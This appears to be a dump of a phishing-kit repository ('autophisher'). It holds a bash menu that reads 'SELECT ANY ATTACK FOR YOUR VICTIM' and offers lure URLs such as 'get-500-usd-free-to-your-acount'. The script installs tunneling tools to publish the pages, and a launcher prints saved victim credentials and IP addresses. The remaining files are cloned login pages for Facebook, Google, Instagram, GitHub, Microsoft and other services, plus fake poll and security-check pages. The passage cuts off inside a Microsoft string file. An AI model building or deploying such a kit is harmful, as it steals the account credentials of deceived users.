site_gmail; };; 551 | esac 552 | } 553 | 554 | 555 | 556 | ## Menu 557 | main_menu() { 558 | { clear; banner; echo; } 559 | cat <<- EOF 560 | ${WHITE}[${GREEN}::${WHITE}]${BLUE} 𝙎𝙀𝙇𝙀𝘾𝙏 𝘼𝙉𝙔 𝘼𝙏𝙏𝘼𝘾𝙆 𝙁𝙊𝙍 𝙔𝙊𝙐𝙍 𝙑𝙄𝘾𝙏𝙄𝙈 ${WHITE}[${GREEN}::${WHITE}]${BLUE} 561 | 562 | ${WHITE}[${GREEN}::${WHITE}]${RED} 𝙋𝙃𝙄𝙎𝙃𝙄𝙉𝙂-𝙈𝙊𝘿𝙐𝙇𝙀𝙎: ${WHITE}[${GREEN}::${WHITE}]${RED} 563 | 564 | ${WHITE}[${GREEN}01${WHITE}]${BLUE} Facebook ${WHITE}[${GREEN}02${WHITE}]${BLUE} Instagram ${WHITE}[${GREEN}03${WHITE}]${BLUE} Google 565 | 566 | ${WHITE}[${GREEN}04${WHITE}]${BLUE} Snapchat ${WHITE}[${GREEN}05${WHITE}]${BLUE} Microsoft ${WHITE}[${GREEN}06${WHITE}]${BLUE} Linkedin 567 | 568 | ${WHITE}[${GREEN}07${WHITE}]${BLUE} Paypal ${WHITE}[${GREEN}08${WHITE}]${BLUE} Twitter ${WHITE}[${GREEN}09${WHITE}]${BLUE} Spotify 569 | 570 | ${WHITE}[${GREEN}10${WHITE}]${BLUE} Mediafire ${WHITE}[${GREEN}11${WHITE}]${BLUE} Github 571 | 572 | 573 | ${WHITE}[${GREEN}99${WHITE}]${BLUE} About ${WHITE}[${GREEN}00${WHITE}]${BLUE} Exit 574 | 575 | EOF 576 | 577 | read -p "${WHITE}[${GREEN}-${WHITE}]${RED} 𝙎𝙀𝙇𝙀𝘾𝙏 𝘼𝙉 𝙊𝙋𝙏𝙄𝙊𝙉 : ${RED}" 578 | 579 | case $REPLY in 580 | 1 | 01) 581 | site_facebook;; 582 | 2 | 02) 583 | site_instagram;; 584 | 3 | 03) 585 | site_gmail;; 586 | 4 | 04) 587 | website="snapchat" 588 | mask='http://view-locked-snapchat-accounts-secretly' 589 | tunnel_menu;; 590 | 5 | 05) 591 | website="microsoft" 592 | mask='http://unlimited-onedrive-space-for-free' 593 | tunnel_menu;; 594 | 6 | 06) 595 | website="linkedin" 596 | mask='http://get-a-premium-plan-for-linkedin-free' 597 | tunnel_menu;; 598 | 7 | 07) 599 | website="paypal" 600 | mask='http://get-500-usd-free-to-your-acount' 601 | tunnel_menu;; 602 | 8 | 08) 603 | website="twitter" 604 | mask='http://get-blue-badge-on-twitter-free' 605 | tunnel_menu;; 606 | 9 | 09) 607 | website="spotify" 608 | mask='http://convert-your-account-to-spotify-premium' 609 | tunnel_menu;; 610 | 10 | 10) 611 | website="mediafire" 612 | mask='http://get-1TB-on-mediafire-free' 613 | tunnel_menu;; 614 | 11 | 11) 615 | website="github" 616 | mask='http://get-1k-followers-on-github-free' 617 | tunnel_menu;; 618 | 619 | 620 | 99) 621 | about;; 622 | 0 | 00 ) 623 | msg_exit;; 624 | *) 625 | echo -ne "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Invalid Option, Try Again..." 626 | { sleep 1; main_menu; };; 627 | 628 | esac 629 | } 630 | 631 | ## Main 632 | kill_pid 633 | dependencies 634 | install_ngrok 635 | install_cloudflared 636 | install_localxpose 637 | main_menu 638 | -------------------------------------------------------------------------------- /crkgithub/android.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/crkgithub/android.jpg -------------------------------------------------------------------------------- /crkgithub/linuxlogo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/crkgithub/linuxlogo.jpg -------------------------------------------------------------------------------- /crkgithub/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/crkgithub/logo.jpg -------------------------------------------------------------------------------- /scripts/launch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # https://github.com/CodingRanjith/autophisher 4 | 5 | if [[ $(uname -o) == *'Android'* ]];then 6 | AUTOPHISHER_ROOT="/data/data/com.termux/files/usr/opt/autophisher" 7 | else 8 | export AUTOPHISHER_ROOT="/opt/autophisher" 9 | fi 10 | 11 | if [[ $1 == '-h' || $1 == 'help' ]]; then 12 | echo "To run autophisher type \`autophisher\` in your cmd" 13 | echo 14 | echo "Help:" 15 | echo " -h | help : Print this menu & Exit" 16 | echo " -c | auth : View Saved Credentials" 17 | echo " -i | ip : View Saved Victim IP" 18 | echo 19 | elif [[ $1 == '-c' || $1 == 'auth' ]]; then 20 | cat $AUTOPHISHER_ROOT/auth/usernames.dat 2> /dev/null || { 21 | echo "No Credentials Found !" 22 | exit 1 23 | } 24 | elif [[ $1 == '-i' || $1 == 'ip' ]]; then 25 | cat $AUTOPHISHER_ROOT/auth/ip.txt 2> /dev/null || { 26 | echo "No Saved IP Found !" 27 | exit 1 28 | } 29 | else 30 | cd $AUTOPHISHER_ROOT 31 | bash ./autophisher.sh 32 | fi 33 | -------------------------------------------------------------------------------- /sites/facebook/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 KasRoudra 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sites/facebook/README.md: -------------------------------------------------------------------------------- 1 | # Facebook Static Login Form (Full offline css and js) 2 | 3 | ## Author: [KasRoudra](https://github.com/KasRoudra) 4 | 5 | #### This is created for educational purposes demonstrating how phishing works. 6 | 7 | ### Use/Copy it legally and provide proper credit -------------------------------------------------------------------------------- /sites/facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /sites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /sites/facebook/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/facebook/logo.svg: -------------------------------------------------------------------------------- 1 | FBWordmark_Hex-RGB-1024 2 | -------------------------------------------------------------------------------- /sites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_advanced/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/fb_advanced/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/fb_advanced/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 109 | 110 |
111 |

VOTERANK

112 |

#289032

113 |
114 | 127 | 128 | -------------------------------------------------------------------------------- /sites/fb_advanced/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /sites/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_messenger/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |




Messenger

Instantly connect with people in your life.

Sign in with Facebook to get started.
5 | 6 | 7 | 8 | 9 |


-------------------------------------------------------------------------------- /sites/fb_messenger/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/fb_security/fb-ico.png -------------------------------------------------------------------------------- /sites/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_security/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Security Check 6 | 7 | 8 | 9 | 10 |
11 |
12 | 15 |
16 |
17 |
18 |
19 | 22 |
23 |

Verify needed to understand it's you

24 |

Enter your password for security reason (make sure your caps lock is off)

25 |

Forgot your password ? Request new one 26 |

27 | 28 | 39 | 40 |
41 | 42 | 67 |
68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/fb_security/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/fb_security/logo.png -------------------------------------------------------------------------------- /sites/fb_security/style.css: -------------------------------------------------------------------------------- 1 | h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | header { 10 | width: 1348px; 11 | height: 84px; 12 | background: #3B5998; 13 | } 14 | 15 | .main-header { 16 | padding-left:184px; 17 | } 18 | 19 | 20 | 21 | .form { 22 | border: 1px solid #cccccc; 23 | border-radius: 5px; 24 | height: 420px; 25 | margin: 60px auto 45px; 26 | width: 641px; 27 | } 28 | 29 | .form h3 { 30 | color: #333333; 31 | border-bottom: 1.5px solid #cccccc; 32 | font-family: tahoma; 33 | font-size: 18px; 34 | font-weight: 600; 35 | margin: 0 20px; 36 | padding: 20px 0 12px; 37 | } 38 | .red-box { 39 | margin:24px auto 0; 40 | width: 600px; 41 | height: 97px; 42 | background: #FFEBE8; 43 | border: 1.5px solid red; 44 | } 45 | 46 | 47 | .red-box p { 48 | font-size: 10.5px; 49 | font-family: tahoma; 50 | padding: 14px 0 0 20px; 51 | } 52 | 53 | .red-box a { 54 | text-decoration: none; 55 | color: #3B5998; 56 | } 57 | 58 | .red-box a:hover { 59 | text-decoration: underline; 60 | } 61 | 62 | .login-form { 63 | width:75%; 64 | margin: 0 auto; 65 | padding: 23px 0 0 0; 66 | } 67 | .login-form label { 68 | font-family: tahoma; 69 | font-size: 13px; 70 | padding: 2px 10px 3px 5px; 71 | } 72 | .login-form input { 73 | padding: 2px 10px 3px 5px; 74 | } 75 | 76 | 77 | footer { 78 | width: 984px; 79 | margin:0 auto; 80 | border-top: 1.5px solid #cccccc; 81 | } 82 | 83 | ul li { 84 | display: inline; 85 | margin: 0 0 0 28px; 86 | } 87 | 88 | 89 | ul li a { 90 | text-decoration: none; 91 | font-family: tahoma; 92 | font-size: 10.5px; 93 | color: #3B5998; 94 | } 95 | ul li a:hover { 96 | text-decoration: underline; 97 | } 98 | -------------------------------------------------------------------------------- /sites/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/github/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | Sign in to GitHub · GitHub 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 |
155 | Skip to content 156 | 157 | 158 | 159 | 160 | 161 | 174 | 175 | 176 | 177 | 184 | 185 | 186 |
187 | 188 |
189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 |
208 |
209 | 210 | 211 | 212 |
213 | 214 | 215 | 216 |
217 |

Sign in to GitHub

218 |
219 | 220 | 221 |
222 | 223 | 224 | 236 |
237 | 238 | 239 | 244 | 245 |
246 | 247 |
250 | 251 | 252 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 |
267 |
268 | 269 | 270 | 271 | 272 | 276 |
277 | 278 |
279 |
280 | 281 | 289 | 290 | 291 | 292 | 299 | 300 | 301 | 307 | 318 | 319 | 323 | 324 | 325 | 326 | 327 | 328 | -------------------------------------------------------------------------------- /sites/github/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/google/avatar.png -------------------------------------------------------------------------------- /sites/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/google/google.png -------------------------------------------------------------------------------- /sites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google_new/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google_new/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google_poll/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/google_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 118 | 119 |
120 |

VOTERANK

121 |

#289032

122 |
123 | 124 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /sites/google_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /sites/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/ig_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/ig_verify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/ig_verify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/ig_verify/login2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/insta_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/insta_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/instagram/badge_android_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/badge_android_english-en.png -------------------------------------------------------------------------------- /sites/instagram/badge_ios_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/badge_ios_english-en.png -------------------------------------------------------------------------------- /sites/instagram/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/favicon.png -------------------------------------------------------------------------------- /sites/instagram/home-phones.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/home-phones.png -------------------------------------------------------------------------------- /sites/instagram/home-phones@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/home-phones@2x.png -------------------------------------------------------------------------------- /sites/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/instagram/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/instagram/screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/screenshot1.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/screenshot2.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/screenshot3.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/screenshot4.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/screenshot5.jpg -------------------------------------------------------------------------------- /sites/instagram/sprite_core_2x_bcd90c1d4868.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/sprite_core_2x_bcd90c1d4868.png -------------------------------------------------------------------------------- /sites/instagram/sprite_core_32f0a4f27407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/instagram/sprite_core_32f0a4f27407.png -------------------------------------------------------------------------------- /sites/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/linkedin/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/mediafire/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/mediafire/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/microsoft/ConvergedLoginPaginatedStrings.EN.js: -------------------------------------------------------------------------------- 1 | !function(e){function o(i){if(t[i])return t[i].exports;var n=t[i]={exports:{},id:i,loaded:!1};return e[i].call(n.exports,n,n.exports,o),n.loaded=!0,n.exports}var t={};return o.m=e,o.c=t,o.p="",o(0)}([function(e,o,t){var i=t(1),n=t(2),r=t(3),_=n.StringsVariantId;i.registerSource("str",function(e,o){switch(e.MOBILE_STR_Header_Brand="Microsoft account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",o.Ac){case _.CombinedSigninSignup:e.WF_STR_HeaderDefault_Title="Hi there!";break;case _.CombinedSigninSignupV2WelcomeTitle:e.WF_STR_HeaderDefault_Title="Welcome";break;default:e.WF_STR_HeaderDefault_Title=o.bn}if(o.d&&o.d.friendlyAppName)if(o.AZ){var t=o.at?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=r.format(t,o.d.friendlyAppName)}else e.WF_STR_HeaderDefault_Title=r.format("Sign in to {0}",o.d.friendlyAppName);switch(o.Ac){case _.SkypeMoveAlias:e.WF_STR_Default_Desc="To continue, verify the password for your Microsoft account.";break;case _.CombinedSigninSignup:case _.CombinedSigninSignupDefaultTitle:e.WF_STR_Default_Desc='This works with Microsoft accounts. Let\'s see if you have one. What\'s this?';break;case _.RemoteConnectLogin:e.WF_STR_Default_Desc='Use your Microsoft account to sign in to {0}. What\'s this?';break;case _.CombinedSigninSignupV2:e.WF_STR_Default_Desc="We'll check to see if you already have a Microsoft account.";break;case _.CombinedSigninSignupV2WelcomeTitle:e.WF_STR_Default_Desc="Let's see if you already have an account with us."}e.WF_STR_LearnMoreLink_Text="What's this?",e.WF_STR_ProgressText="Please wait",e.WF_STR_ThisIsntMyNumber_Text="This isn't my number",e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.CT_STR_More_Options_Ellipsis_AriaLabel="Click here for more options",e.CT_STR_Error_Details_Close_AltText="Close error details",e.MOBILE_STR_Footer_Microsoft="Microsoft",e.MOBILE_STR_Footer_Privacy="Privacy & cookies",e.MOBILE_STR_Footer_Terms="Terms of use",e.WF_STR_Footer_LinkDisclaimer_Text="Link Disclaimer",e.WF_STR_GenericError_Title="Something went wrong and we can't sign you in right now. Please try again later.",e.CT_PWD_STR_Email_Example="Email, phone, or Skype",e.CT_PWD_STR_Username_AriaLabel="Enter your email, phone, or Skype.",e.CT_STR_CountryCodeError="Please verify the country code.",e.CT_PWD_STR_PwdTB_Label="Password",e.CT_PWD_STR_PwdTB_AriaLabel="Enter password",e.CT_WPIL_STR_Android_UseDifferentAddress="Use a different account",e.CT_PWD_STR_ForgotPwdLink_Text="Forgot my password",e.CT_PWD_STR_ForgotPwdLink_SplitterText="What kind of account do you have?",e.CT_PWD_STR_KeepMeSignedInCB_Text="Keep me signed in",e.CT_PWD_STR_SignIn_Button="Sign in",e.CT_PWD_STR_SignIn_Button_Next="Next",e.CT_PWD_STR_SwitchToOTC_Link="Sign in with a single-use code",e.CT_PWD_STR_SwitchToRemoteNGC_Link="Use the Microsoft Authenticator app instead",e.CT_PWD_STR_SignUp_MenuLink="Create an account",e.CT_PWD_STR_MoreOptions_Link="More options",e.CT_PWD_STR_MoreOptions_Link_AriaLabel="Show additional options for signing in",e.CT_PWD_STR_Error_InvalidUsername="Enter a valid email address, phone number, or Skype name.",e.CT_PWD_STR_Error_GetCredentialTypeError="There was an issue looking up your account. Tap Next to try again.",e.CT_PWD_STR_Error_InvalidPhoneNumber="That phone number doesn't look right. Please check the country code and phone number.",e.CT_PWD_STR_Error_InvalidPhoneFormatting="The phone number you entered isn't valid. Your phone number can contain numbers, spaces, and these special characters: ( ) [ ] . - # * /",e.CT_PWD_STR_Error_MissingPassword="Please enter the password for your Microsoft account.",e.CT_PWD_STR_Error_FedNotAllowed="You cannot use this account for this purpose because it belongs to an organization. Please choose a different account or sign up for a new one.",e.CT_PWD_STR_Error_UsernameNotExist=o.AO?'That Microsoft account doesn\'t exist. Enter a different account or get a new one.':"That Microsoft account doesn't exist. Please enter a different account.",e.CT_PWD_STR_PersistentCookies_Warning="Your account will be remembered on this device.",e.CT_FED_STR_ChangeUserLink_Text="Sign in with a different Microsoft account",e.CT_FED_STR_GoThereLink_Text="Sign in at #~#partnerdomain#~#",e.WF_STR_ForceSI_Info="Because you're accessing sensitive info, you need to verify your password.",e.WF_STR_SwitchUser_Title="You're already signed in.",e.WF_STR_SwitchUser_Stay="Remain signed in with this account.",e.WF_STR_SwitchUser_Switch="Sign out and sign in with a different account.",e.WF_STR_Switch_SignOutDesc="(You will be signed out of all Microsoft services you are using currently with your #~#FederatedDomainName_LS#~# account.)",e.WF_STR_Switch_DifferentID="Sign in with a different Microsoft account",e.WF_STR_InviteBlocked_Error="Sorry, you can't use your #~#FederatedDomainName_LS#~# account to sign in here.",e.WF_STR_ServiceBlocked_Error="Sorry, we can't sign you in here with your #~#FederatedDomainName_LS#~# account.",e.WF_STR_IDPFailed_GenericError="Your organization could not sign you in to this service.",e.WF_STR_IDPFailed_Error="#~#FederatedPartnerName_LS#~# could not sign you in here.",e.WF_STR_IDPFailed_Desc1="Your #~#FederatedDomainName_LS#~# account may not be enabled to use this service or there may be a system error at #~#FederatedPartnerName_LS#~#.",e.WF_STR_IDPFailed_Desc2=" Please try again later, and contact the administrator at #~#FederatedPartnerName_LS#~# if this problem persists.",e.WF_STR_IDPFailed_GenericDesc="Please try again later, and contact the administrator at your organization if this problem persists.",e.MOBILE_STR_SignIn_MSAcctHelpHeading="What is a Microsoft account?",e.MOBILE_STR_SignIn_MSAcctHelpDesc="A Microsoft account is what you use to sign in to Microsoft services such as Outlook.com, Skype, OneDrive, Office, Xbox, Windows and more. Sign in for your personalized experience.",e.MOBILE_STR_SignIn_MSAcctHelpDone_Button="OK",e.CT_HIP_ID_P_HipLockout_Info="Help us make sure you're not a robot.",e.CT_HIP_STR_HIP_ISLOADING="Loading ...",e.WF_STR_Lockout_AnotherID_Text="Sign in using another Microsoft account",e.WF_STR_Lockout_Title="Sign-in is blocked",e.WF_STR_Lockout_Desc="Sign-in with #~#MemberName_LS#~# is blocked for one of these reasons:",e.WF_STR_Lockout_Reason1="Someone entered the wrong password too many times.",e.WF_STR_Lockout_Reason2="If you signed up for this account through an organization, you might not be able to use it yet.",e.WF_STR_Lockout_Reset_Text="Reset your password",e.WF_STR_HIP_Label="Enter these characters",e.WF_STR_HIPAudio_Label="Enter the characters you hear",e.CT_PWD_STR_Continue_Button="Continue",e.CT_PWD_STR_ContinueBtn_Tooltip="You are signed in on this computer with this Microsoft account.",e.CT_PWD_STR_SignedIn_Label="You're already signed in",e.CT_HRD_STR_Splitter_Heading="It looks like this email is used with more than one account from Microsoft. Which one do you want to use?",e.CT_HRD_STR_Splitter_Error_Heading="We're having trouble locating your account. Which type of account do you want to use?",e.CT_HRD_STR_Splitter_AadTile_Title="Work or school account",e.CT_HRD_STR_Splitter_AadTile_Hint="Created by your IT department",e.CT_HRD_STR_Splitter_MsaTile_Title="Personal account",e.CT_HRD_STR_Splitter_MsaTile_Hint="Created by you",e.CT_HRD_STR_Redirect_Title_GitHub="Taking you to the GitHub sign-in page...",e.CT_HRD_STR_Splitter_Back="Back",e.CT_HRD_STR_Redirect_Title="Taking you to your organization's sign-in page",e.CT_HRD_STR_Redirect_Cancel="Cancel",e.WF_STR_FIDO_ReAuthUserPrompt="Use your PIN or Windows Hello to prove you own {0}",e.CT_IL_STR_Error_OldSkypePwd="Your old Skype password doesn't work anymore. Try the password for your Microsoft account.",e.CT_PWD_STR_EnterPassword_Title="Enter password",e.CT_PWD_STR_RemoteConnect_PasswordPage_Desc="Enter the password to sign in to {0} with {1}",e.CT_OTC_STR_SignIn_ReSendInfo="It may take a few minutes for the code to arrive. Are you sure you want to request a new code?",e.CT_OTC_STR_YesButton_Text="Yes",e.CT_OTC_STR_NoButton_Text="No",e.CT_OTC_STR_EnterCode_Title="Enter code",e.CT_OTC_STR_EnterCode_Desc="We just sent a code to {0}",e.CT_OTC_STR_EnterCode_Text="Code",e.CT_OTC_STR_EnterCode_AriaLabel="Enter the code you received",e.CT_OTC_STR_Error_EmptyCode="To continue, enter the code we just sent you.",e.CT_OTC_STR_Error_CodeIncorrect="That code didn't work. Check the code and try again.",e.CT_OTC_STR_Error_ServerError="This service isn't available right now. Please try again later.",e.CT_OTC_STR_Error_OTCInvalid="Please enter the 7-digit code. The code only contains numbers.",e.CT_OTC_STR_Error_SendCodeError="We couldn't send the code. Please try 